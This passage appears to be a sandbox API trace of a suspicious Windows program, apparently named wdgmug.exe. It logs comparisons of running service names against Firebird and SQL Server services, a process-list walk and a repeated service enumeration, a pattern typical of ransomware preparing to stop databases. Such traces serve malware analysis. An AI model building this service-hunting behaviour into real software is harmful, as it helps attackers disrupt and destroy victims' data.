(lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0293.168] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0293.168] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0293.168] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0293.168] lstrlenW (lpString="ProfSvc") returned 7 [0293.168] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0293.168] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0293.168] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0293.168] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0293.168] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0293.168] lstrlenW (lpString="RpcEptMapper") returned 12 [0293.168] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0293.168] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0293.168] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0293.168] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0293.168] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0293.168] lstrlenW (lpString="RpcSs") returned 5 [0293.168] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0293.168] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0293.168] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0293.168] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0293.168] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0293.168] lstrlenW (lpString="SamSs") returned 5 [0293.169] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0293.169] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0293.169] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0293.169] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0293.169] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0293.169] lstrlenW (lpString="Schedule") returned 8 [0293.169] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0293.169] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0293.169] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0293.169] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0293.169] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0293.169] lstrlenW (lpString="SecurityHealthService") returned 21 [0293.169] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0293.169] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0293.169] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0293.169] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0293.169] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0293.169] lstrlenW (lpString="SENS") returned 4 [0293.169] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0293.169] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0293.169] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0293.169] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0293.169] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0293.169] lstrlenW (lpString="ShellHWDetection") returned 16 [0293.169] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0293.169] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0293.169] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0293.169] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0293.169] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0293.169] lstrlenW (lpString="Spooler") returned 7 [0293.170] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0293.170] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0293.170] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0293.170] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0293.170] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0293.170] lstrlenW (lpString="StateRepository") returned 15 [0293.170] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0293.170] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0293.170] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0293.170] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0293.170] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0293.170] lstrlenW (lpString="SysMain") returned 7 [0293.170] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0293.170] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0293.170] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0293.170] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0293.170] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0293.170] lstrlenW (lpString="SystemEventsBroker") returned 18 [0293.170] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0293.170] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0293.170] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0293.170] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0293.170] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0293.170] lstrlenW (lpString="Themes") returned 6 [0293.170] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0293.170] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0293.170] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0293.170] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0293.170] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0293.170] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0293.170] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0293.170] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0293.171] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0293.171] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0293.171] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="tiledatamodelsvc") returned -1 [0293.171] lstrlenW (lpString="TimeBrokerSvc") returned 13 [0293.171] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0293.171] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0293.171] lstrcmpiW (lpString1="sqlwriter", lpString2="TimeBrokerSvc") returned -1 [0293.171] lstrcmpiW (lpString1="mssqlserver", lpString2="TimeBrokerSvc") returned -1 [0293.171] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4016da0 | out: hHeap=0x470000) returned 1 [0293.171] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x434 [0293.177] Process32FirstW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.177] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0293.178] lstrlenW (lpString="System") returned 6 [0293.178] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0293.178] lstrlenW (lpString="smss.exe") returned 8 [0293.179] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0293.179] lstrlenW (lpString="csrss.exe") returned 9 [0293.179] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0293.400] lstrlenW (lpString="wininit.exe") returned 11 [0293.400] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0293.403] lstrlenW (lpString="csrss.exe") returned 9 [0293.403] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0293.404] lstrlenW (lpString="winlogon.exe") returned 12 [0293.404] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0293.405] lstrlenW (lpString="services.exe") returned 12 [0293.405] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0293.405] lstrlenW (lpString="lsass.exe") returned 9 [0293.405] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0293.406] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0293.406] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0293.407] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0293.407] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.408] lstrlenW (lpString="svchost.exe") returned 11 [0293.408] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.408] lstrlenW (lpString="svchost.exe") returned 11 [0293.408] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0293.409] lstrlenW (lpString="dwm.exe") returned 7 [0293.409] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.410] lstrlenW (lpString="svchost.exe") returned 11 [0293.410] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.410] lstrlenW (lpString="svchost.exe") returned 11 [0293.410] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.411] lstrlenW (lpString="svchost.exe") returned 11 [0293.411] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.412] lstrlenW (lpString="svchost.exe") returned 11 [0293.412] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.412] lstrlenW (lpString="svchost.exe") returned 11 [0293.412] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.413] lstrlenW (lpString="svchost.exe") returned 11 [0293.413] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.414] lstrlenW (lpString="svchost.exe") returned 11 [0293.414] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.418] lstrlenW (lpString="svchost.exe") returned 11 [0293.418] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.419] lstrlenW (lpString="svchost.exe") returned 11 [0293.419] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.419] lstrlenW (lpString="svchost.exe") returned 11 [0293.419] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0293.420] lstrlenW (lpString="spoolsv.exe") returned 11 [0293.420] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.421] lstrlenW (lpString="svchost.exe") returned 11 [0293.421] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0293.421] lstrlenW (lpString="audiodg.exe") returned 11 [0293.421] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0293.422] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0293.422] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0293.423] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0293.423] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0293.423] lstrlenW (lpString="Memory Compression") returned 18 [0293.423] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0293.423] lstrlenW (lpString="sihost.exe") returned 10 [0293.423] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.424] lstrlenW (lpString="svchost.exe") returned 11 [0293.424] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0293.425] lstrlenW (lpString="taskhostw.exe") returned 13 [0293.425] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x48, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0293.425] lstrlenW (lpString="explorer.exe") returned 12 [0293.425] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0293.428] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0293.428] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0293.428] lstrlenW (lpString="SearchUI.exe") returned 12 [0293.429] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0293.429] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0293.429] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0293.430] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0293.430] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0293.430] lstrlenW (lpString="wdgmug.exe") returned 10 [0293.430] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0293.431] lstrlenW (lpString="cmd.exe") returned 7 [0293.431] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0293.431] lstrlenW (lpString="conhost.exe") returned 11 [0293.431] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 1 [0293.432] lstrlenW (lpString="mode.com") returned 8 [0293.432] Process32NextW (in: hSnapshot=0x434, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 0 [0293.432] CloseHandle (hObject=0x434) returned 1 [0293.432] Sleep (dwMilliseconds=0x1f4) [0294.360] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x401a1c0 [0294.361] EnumServicesStatusExW (in: hSCManager=0x401a1c0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0294.368] GetLastError () returned 0xea [0294.368] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1bc4) returned 0x401ba18 [0294.368] EnumServicesStatusExW (in: hSCManager=0x401a1c0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x401ba18, cbBufSize=0x1bc4, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x401ba18, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0294.369] CloseServiceHandle (hSCObject=0x401a1c0) returned 1 [0294.369] lstrlenW (lpString="AppXSvc") returned 7 [0294.369] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0294.369] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0294.370] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0294.370] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0294.370] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0294.370] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0294.370] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0294.370] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0294.370] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0294.370] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0294.370] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0294.370] lstrlenW (lpString="Audiosrv") returned 8 [0294.370] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0294.370] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0294.370] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0294.370] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0294.370] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0294.370] lstrlenW (lpString="BFE") returned 3 [0294.370] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0294.370] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0294.370] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0294.370] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0294.370] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0294.370] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0294.370] lstrcmpiW 